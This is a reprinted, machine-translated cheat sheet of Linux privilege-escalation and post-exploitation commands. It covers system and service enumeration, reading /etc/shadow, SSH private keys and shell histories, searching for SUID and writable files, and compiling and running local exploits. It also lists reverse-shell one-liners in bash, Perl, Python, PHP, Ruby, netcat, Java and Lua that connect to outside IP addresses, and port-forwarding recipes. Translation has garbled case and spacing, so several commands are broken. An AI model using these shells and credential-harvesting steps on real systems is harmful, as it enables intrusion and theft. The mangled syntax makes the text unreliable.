Reprint: http://www.myhack58.com/Article/html/3/8/2017/83236.htm0x00 Operating system related
Operating system Type version
- Cat/etc/issue
- Cat/etc/*-release
- Cat/etc/lsb-release # Debian
- Cat/etc/redhat-release # Redhat
Kernel version, whether it is 64-bit
- Cat/proc/version
- Uname-a
- Uname-mrs
- Rpm-q kernel
- DMESG | grep Linux
- Ls/boot | grep vmlinuz-
Environment variables
- Cat/etc/profile
- Cat/etc/bashrc
- Cat ~/.bash_profile
- Cat ~/.BASHRC
- Cat ~/.bash_logout
- Env
- Set
See if a printer is available
- Lpstat-a
0X01 Applications related to services
View running programs and their corresponding user rights
- PS aux
- Ps-ef
- Top
- Cat/etc/services
A process running with root privileges
- PS aux | grep root
- Ps-ef | grep root
View installed Apps
- ls-alh/usr/bin/
- ls-alh/sbin/
- Dpkg-l
- Rpm-qa
- Ls-alh/var/cache/apt/archives
- ls-alh/var/cache/yum/
Configuration files for some services
- Cat/etc/syslog.conf
- Cat/etc/chttp.conf
- Cat/etc/lighttpd.conf
- Cat/etc/cups/cupsd.conf
- Cat/etc/inetd.conf
- Cat/etc/apache2/apache2.conf
- Cat/etc/my.conf
- Cat/etc/httpd/conf/httpd.conf
- Cat/opt/lampp/etc/httpd.conf
- ls-arl/etc/| awk ' $ ~/^.*r.*/'
Scheduled Tasks
- Crontab-l
- Ls-alh/var/spool/cron
- ls-al/etc/| grep cron
- ls-al/etc/cron*
- cat/etc/cron*
- Cat/etc/at.allow
- Cat/etc/at.deny
- Cat/etc/cron.allow
- Cat/etc/cron.deny
- Cat/etc/crontab
- Cat/etc/anacrontab
- Cat/var/spool/cron/crontabs/root
Find the stored plaintext user name, password
- Grep-i user [filename]
- Grep-i pass [filename]
- Grep-c 5 "Password" [filename]
- Find. -name "*.php"-print0 | xargs-0 grep-i-N "var $password" # Joomla
0X02 Communication and network related
View current network Address
- /sbin/ifconfig-a
- Cat/etc/network/interfaces
- Cat/etc/sysconfig/network
View network configuration, DNS,DHCP, gateways
- Cat/etc/resolv.conf
- Cat/etc/sysconfig/network
- Cat/etc/networks
- Iptables-l
- Hostname
- DnsDomainName
View network traffic
- Lsof-i
- Lsof-i: 80
- grep 80/etc/services
- Netstat-antup
- Netstat-antpx
- Netstat-tulpn
- Chkconfig--list
- Chkconfig--list | grep 3:on
- Last
- W
View Cache
- Arp-e
- Route
- /sbin/route-nee
Tcpdump
- Tcpdump TCP DST 192.168.1.7 and TCP DST 10.2.2.222 21
tcpdump TCP DST [IP] [port] and TCP DST [IP] [port]
Interactive shell
Bash version:
- Bash-i >&/dev/tcp/10.0.0.1/8080 0>&1
Perl version:
- Perl-e ' use Socket; $i = "10.0.0.1"; $p =1234;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '
Python version:
- Python-c ' Import socket,subprocess,os;s=socket.socket (socket.af_inet,socket. SOCK_STREAM); S.connect (("10.0.0.1", 1234)); Os.dup2 (S.fileno (), 0); Os.dup2 (S.fileno (), 1); Os.dup2 (S.fileno (), 2);p =subprocess.call (["/bin/sh", "-I"]); '
PHP Version:
- Php-r ' $sock =fsockopen ("10.0.0.1", 1234); EXEC ("/bin/sh-i <&3 >&3 2>&3"); '
Ruby version:
- Ruby-rsocket-e ' F=tcpsocket.open ("10.0.0.1", 1234). To_i;exec sprintf ("/bin/sh-i <&%d >&%d 2>&%d ", F,f,f) '
NC Version:
- NC-E/bin/sh 223.8.200.234 1234
NC does not use-e:
- Mknod/tmp/backpipe P
- /bin/sh 0</tmp/backpipe | NC attackerip Listenport 1>/tmp/backpipe
Mknod
- Mknod backpipe P && telnet 173.214.173.151 8080 0backpipe
Java version:
- R = Runtime.getruntime ()
- p = r.exec (["/bin/bash", "-C", "Exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | and" read line; do \ $line 2&G T;&5 >&5; Done "] as string[])
- P.waitfor ()
LUA version:
- Lua-e "require (' socket '); require (' OS '); t=socket.tcp (); T:connect (' 202.103.243.122 ', ' 1234 '); Os.execute ('/bin/sh-i <&3 >&3 2>&3 '); "
Port forwarding
LCX-<listen|tran|slave>
- Lcx-listen 4567 33891 #Attacker
- Lcx-slave 111.222.333.444 4567 127.0.0.1 3389 # on the targets
SSH-[L/R] [local port]:[remote ip]:[remote Port] [local user]@[local IP]
- Ssh-l 8080:127.0.0.1:80 [email protected] # Local Port
- Ssh-r 8080:127.0.0.1:80 [email protected] # Remote Port
Mknod Backpipe p; NC-L-P [remote port] < Backpipe | NC [local IP] [local port] >backpipe
- Mknod Backpipe p; Nc-l-P 8080 < Backpipe | NC 10.1.1.251 >backpipe
- Mknod Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow 1>backpipe # Proxy (Port 8080)
- Mknod Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow & 1>backpipe # Proxy Monitor (Port 8080)
Tunnel
- Ssh-d 127.0.0.1:9050-n [Username]@[ip]
- Proxychains ifconfig
0X03 User-related
User Information
- Id
- W.H.O.
- W
- Last
- cat/etc/passwd
- Cat/etc/group
- Cat/etc/shadow
- ls-alh/var/mail/
- Grep-v-E "^#"/etc/passwd | Awk-f: ' $ = = 0 {print '} ' # list super users
- Awk-f: ' ($ = = "0") {print} '/etc/passwd #列出超级用户
- Cat/etc/sudoers
- Sudo-l
List of home directories
- ls-ahlr/root/
- ls-ahlr/home/
Find the password from the configuration file
- Cat/var/apache2/config.inc
- Cat/var/lib/mysql/mysql/user. MYD
- Cat/root/anaconda-ks.cfg
See other user's action record
- Cat ~/.bash_history
- Cat ~/.nano_history
- Cat ~/.atftp_history
- Cat ~/.mysql_history
- Cat ~/.php_history
SSH private key
- Cat ~/.ssh/authorized_keys
- Cat ~/.ssh/identity.pub
- Cat ~/.ssh/identity
- Cat ~/.ssh/id_rsa.pub
- Cat ~/.ssh/id_rsa
- Cat ~/.ssh/id_dsa.pub
- Cat ~/.SSH/ID_DSA
- Cat/etc/ssh/ssh_config
- Cat/etc/ssh/sshd_config
- Cat/etc/ssh/ssh_host_dsa_key.pub
- Cat/etc/ssh/ssh_host_dsa_key
- Cat/etc/ssh/ssh_host_rsa_key.pub
- Cat/etc/ssh/ssh_host_rsa_key
- Cat/etc/ssh/ssh_host_key.pub
- Cat/etc/ssh/ssh_host_key
0x04 File System Related
/etc/Directory below file
- ls-arl/etc/| awk ' $ ~/^.*w.*/' 2>/dev/null # anyone
- ls-arl/etc/| awk ' $ ~/^. w/' 2>/dev/null # Owner
- ls-arl/etc/| awk ' $ ~/^.....w/' 2>/dev/null # Group
- ls-arl/etc/| awk ' $ ~/w.$/' 2>/dev/null # Other
- find/etc/-readable-type F 2>/dev/null # anyone
- find/etc/-readable-type f-maxdepth 1 2>/dev/null # anyone
Log file
- Ls-alh/var/log
- Ls-alh/var/mail
- Ls-alh/var/spool
- Ls-alh/var/spool/lpd
- Ls-alh/var/lib/pgsql
- Ls-alh/var/lib/mysql
- Cat/var/lib/dhcp3/dhclient.leases
View Web site Files
- ls-alhr/var/www/
- ls-alhr/srv/www/htdocs/
- ls-alhr/usr/local/www/apache22/data/
- ls-alhr/opt/lampp/htdocs/
- ls-alhr/var/www/html/
Common Log files
- Cat/etc/httpd/logs/access_log
- Cat/etc/httpd/logs/access.log
- Cat/etc/httpd/logs/error_log
- Cat/etc/httpd/logs/error.log
- Cat/var/log/apache2/access_log
- Cat/var/log/apache2/access.log
- Cat/var/log/apache2/error_log
- Cat/var/log/apache2/error.log
- Cat/var/log/apache/access_log
- Cat/var/log/apache/access.log
- Cat/var/log/auth.log
- Cat/var/log/chttp.log
- Cat/var/log/cups/error_log
- Cat/var/log/dpkg.log
- Cat/var/log/faillog
- Cat/var/log/httpd/access_log
- Cat/var/log/httpd/access.log
- Cat/var/log/httpd/error_log
- Cat/var/log/httpd/error.log
- Cat/var/log/lastlog
- Cat/var/log/lighttpd/access.log
- Cat/var/log/lighttpd/error.log
- Cat/var/log/lighttpd/lighttpd.access.log
- Cat/var/log/lighttpd/lighttpd.error.log
- Cat/var/log/messages
- Cat/var/log/secure
- Cat/var/log/syslog
- Cat/var/log/wtmp
- Cat/var/log/xferlog
- Cat/var/log/yum.log
- Cat/var/run/utmp
- Cat/var/webmin/miniserv.log
- Cat/var/www/logs/access_log
- Cat/var/www/logs/access.log
- ls-alh/var/lib/dhcp3/
- ls-alh/var/log/postgresql/
- ls-alh/var/log/proftpd/
- ls-alh/var/log/samba/
File mount
- Mount
- Df-h
- Cat/etc/fstab
Find command
- Find/-perm-1000-type D 2>/dev/null # Only the directory owner can change the delete
- Find/-perm-g=s-type F 2>/dev/null # SGID (chmod)-run as the group, not the user who started it.
- Find/-perm-u=s-type F 2>/dev/null # SUID (chmod 4000)-run as the owner, not the user who started it.
- Find/-perm-g=s-o-perm-u=s-type F 2>/dev/null # SGID or SUID
- For i in ' locate-r ' bin$ "'; Do find $i \ (-perm-4000-o-perm-2000 \)-type F 2>/dev/null; Done # from the following locations:/bin,/sbin,/usr/bin,/usr/sbin,/usr/local/bin,/usr/local/sbin or other bin directories looking for
- Find/-perm-g=s-o-perm-4000! -type l-maxdepth 3-exec ls-ld {} \; 2>/dev/null #从/,sgud or suid to find, exclude symbolic links, depth of 3 folders, display a detailed list and remove error messages
Find a writable directory
- Find/-writable-type D 2>/dev/null # writable Directory
- Find/-perm-222-type D 2>/dev/null # writable Directory
- Find/-perm-o w-type d 2>/dev/null # writable Directory
- Find/-perm-o x-type d 2>/dev/null # executable directory
- Find/\ (-perm-o w-perm-o x \)-type d 2>/dev/null # writable executable
- Directory
Find Files
- Find/-xdev-type d \ (-perm-0002-a!-perm-1000 \)-print 2>/dev/null # writable file
- Find/dir-xdev \ (-nouser-o-nogroup \)-print 2>/dev/null # no owner file
0x05 Preparation and attack
View language Support
- Find/-name perl*
- Find/-name python*
- Find/-name gcc*
- Find/-name cc
View Upload Method
- Find/-name wget
- Find/-name nc*
- Find/-name netcat*
- Find/-name tftp*
- Find/-name FTP
Find EXP
Http://www.exploit-db.com
Http://1337day.com
Http://www.securiteam.com
Http://www.securityfocus.com
Http://www.exploitsearch.net
http://metasploit.com/modules/
Http://securityreason.com
Http://seclists.org/fulldisclosure/
http://www.google.com
Compiling exp
- which GCC
- GCC exp.c-o Exp
Run
- CHMOD +x Exp
- ./exp
0X06 Power Assist Script
LineNum
linuxprivchecker.py
Not all of the above, there may be any errors, please make a big correction or supplement. Learn to communicate.
The common command set for Linux to raise weights